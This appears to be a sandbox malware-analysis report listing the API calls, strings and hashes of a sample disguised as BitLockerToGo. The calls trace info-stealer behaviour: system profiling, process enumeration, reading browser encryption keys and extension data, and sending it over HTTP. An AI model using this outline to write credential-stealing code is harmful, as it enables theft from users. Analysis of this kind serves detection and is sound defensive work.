                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(02A378C8,?,?,?,02A15F8F,Processor: ,[Hardware],02A37990,00000000,TimeZone: ,02A37980,00000000,Local Time: ,02A3796C,Keyboard Languages: ,02A37950), ref: 02A12C0B
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3225020163-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 57b206ff0ff7f9b33a6759c5086919f1f78ffda7ac70b9720a0d7858720af63c
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 15ed822aff78ae47885f39831119d882fa0e54ef43d17d28a295d21249fcb2ac
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57b206ff0ff7f9b33a6759c5086919f1f78ffda7ac70b9720a0d7858720af63c
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6F0307DA80204BFEB105B91DC0FFAB7ABDEB44700F140624FF01A5180D7B05960DB51
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,02A0EAFD), ref: 02A0963B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121A5: lstrlen.KERNEL32(?,?,02A19098,02A377FE,02A37787,?,?,?,?,02A19D6E), ref: 02A121AB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121A5: lstrcpy.KERNEL32(00000000,00000000), ref: 02A121DD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • SetEnvironmentVariableA.KERNEL32(?,02A38334,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,02A37846,?,?,?,?,?,?,?,?,02A0EAFD), ref: 02A09690
                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,02A0EAFD), ref: 02A096A4
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 02A0962F, 02A09634, 02A0964E
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                                                                                                                                                          • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2929475105-4027016359
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 443bc80152ce1e12c4a506a50adbd3e9c36439bfe9db188956cc8047d1032edf
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1eec35ed308c9815eb33c70e8a872cca8a27cccb245e86d9837d3946444d23ed
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 443bc80152ce1e12c4a506a50adbd3e9c36439bfe9db188956cc8047d1032edf
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE313239D80115DFEB11AF29FD8569FB7F2AB447407080B25E94863150EFB26AA6CF81
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 02A18B1C
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,0000001C), ref: 02A18B27
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A18BAB
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: H_prolog3_catchlstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: ERROR
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 591506033-2861137601
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4dd1c75771b02474c8e5b02f3cb94f7a1ff2f8f5bc18b87ec0ce148bda185d70
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4d8b79047e74f60d1b29156fa5fb9b7d7281c1feb1b6670843af8f4022c4e955
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dd1c75771b02474c8e5b02f3cb94f7a1ff2f8f5bc18b87ec0ce148bda185d70
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53114C71D4050AAFDB40EB74EA4669DBBB2BF04320B440621EE14A3150DF35EA69CFC1
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A138A6: GetSystemTime.KERNEL32(?,02A37807,?), ref: 02A138D5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0C320
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A0C472
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A0C48D
                                                                                                                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 02A0C4DF
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 211194620-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4d64d7572ca85f65fa171a8a5e84e8c60f220ae60f597aa45ebfa55c5058cb10
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1e591324c643d12945e438e8dd661fd30c0999e2b15d979714be8d3d9579622f
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d64d7572ca85f65fa171a8a5e84e8c60f220ae60f597aa45ebfa55c5058cb10
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C711A32D801199BDF01FBB5EE85ADEB7B6BF04350B100521ED44B71A0DF62AE568F91
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A09163
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0F752,?,?,?), ref: 02A0917A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0F752,?,?,?), ref: 02A09191
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A091A8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CloseHandle.KERNEL32(?,?,?,?,?,02A0F752,?,?,?), ref: 02A091D0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,02A18680,?), ref: 02A13A93
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,?,02A38700,02A3796B), ref: 02A0E492
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A0E4A5
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                                                                                                                                                                                                                                                          • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 161838763-3310892237
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 29bfab310a581fbe078817fabb96ae88fa6a58b0a26b228643f5591cc4285fe7
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9587202725a55bf8d2f059a65ceba726be00edf99e7694a88004aef78c47a757
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29bfab310a581fbe078817fabb96ae88fa6a58b0a26b228643f5591cc4285fe7
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7741D832D80129ABCF10FBB5EE86ACDB7B6AF08350B510520ED44B7194DF25AE598FD1
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,02A37817,?,?), ref: 02A13130
                                                                                                                                                                                                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 02A13140
                                                                                                                                                                                                                                                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 02A1319E
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A131A9
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 907984538-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 67fedecc8e4b1e4a0913115a252a766b5c61f5ee8e176bfc6e1e5ad26a87adf5
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b1fec1278e0b9e131e009e49df4c31a57daf97216f92add214a1ef446ce3e0c6
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67fedecc8e4b1e4a0913115a252a766b5c61f5ee8e176bfc6e1e5ad26a87adf5
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7117075A80228ABEB11AF64AD85BEEB7AAAF04720F000595BD05A7240DF34DF44CF91
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 02A10D57
                                                                                                                                                                                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 02A10D7D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A30478: std::exception::exception.LIBCMT ref: 02A3048D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A30478: __CxxThrowException@8.LIBCMT ref: 02A304A2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A30478: std::exception::exception.LIBCMT ref: 02A304B3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A10927: malloc.MSVCRT ref: 02A10936
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A10927: __CxxThrowException@8.LIBCMT ref: 02A10951
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Exception@8Throwstd::exception::exception$H_prolog3_catchXinvalid_argumentmallocstd::_
                                                                                                                                                                                                                                                                                                                                                          • String ID: vector<T> too long
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 285619538-3788999226
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d2431c5157309beeaf12539bdeec12ad5f246c8ca9b73c38986b6c1d63801e74
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 638bd0d368430994755790976449d3cceffce9b86b4584dfb1e8a79d2df3223e
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2431c5157309beeaf12539bdeec12ad5f246c8ca9b73c38986b6c1d63801e74
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0319F71A4060A9FDB15DF68CA40AAEBBF2FF94320B14852DE959E7250EF30A941CF50
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A068F1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: StrCmpCA.SHLWAPI(?), ref: 02A0690B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A0693A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 02A06979
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A069A9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02A069B4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 02A069D8
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A185C2
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID: ERROR$ERROR
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3086566538-2579291623
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 06c1515dff6fa05ddc9a0a14c4eb4aac360cc8af4ee0ba09daa78eb36824fe97
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: aa308d36dd16028d77c51a952189c0e137eb0a3c7d476eff459f8bdb73718b52
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06c1515dff6fa05ddc9a0a14c4eb4aac360cc8af4ee0ba09daa78eb36824fe97
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8016D71D80258ABDB10FB75EE85A8D37AAAF44360B400561ED24A3251EF34EA098ED1
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8,?,?), ref: 02A18C4D
                                                                                                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,02A18B15,?,00000000,00000000), ref: 02A18C85
                                                                                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A18C8D
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4198075804-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: afdeb248de92ce72fa0d7ae36c86f146ae309291979c044b5fc970f9f1f2cfb8
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6eec95f7d2426fdfbb631a8f5b0b504ff622bd54fb08d47768ec7deac4b59f55
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afdeb248de92ce72fa0d7ae36c86f146ae309291979c044b5fc970f9f1f2cfb8
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37212576841119ABEF01EF55ED849DE7BBAEF44364B044226FE05A3110DB74AA8ACF90
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,02A167CA), ref: 02A142A6
                                                                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,02A167CA,02A167CA,00000000,?,?,?,02A167CA), ref: 02A142CD
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,02A167CA), ref: 02A142E4
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1065093856-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,02A15B27,00000000,?), ref: 02A13F03
                                                                                                                                                                                                                                                                                                                                                          • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 02A13F1E
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A13F25
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3183270410-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02A01375), ref: 02A128ED
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A128F4
                                                                                                                                                                                                                                                                                                                                                          • GetComputerNameA.KERNEL32(00000000,02A01375), ref: 02A12908
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocateComputerNameProcess
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1664310425-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Opera GX,02A37926,02A37913,?,?,?), ref: 02A0D918
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A13A59
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A139EE: GetFileAttributesA.KERNEL32(?,?,?,02A0EA72,?,?,?), ref: 02A139F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A093A4: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?), ref: 02A093EE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A093A4: lstrlen.KERNEL32(00000001,?,?,?,?,?,?), ref: 02A0947F
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpy$lstrcatlstrlen$AttributesFileFolderPath
                                                                                                                                                                                                                                                                                                                                                          • String ID: Opera GX
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 729072150-3280151751
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 617fe49af4a853afe8f9c7632822a101b952111d14bc4455ea81976d686b79f9
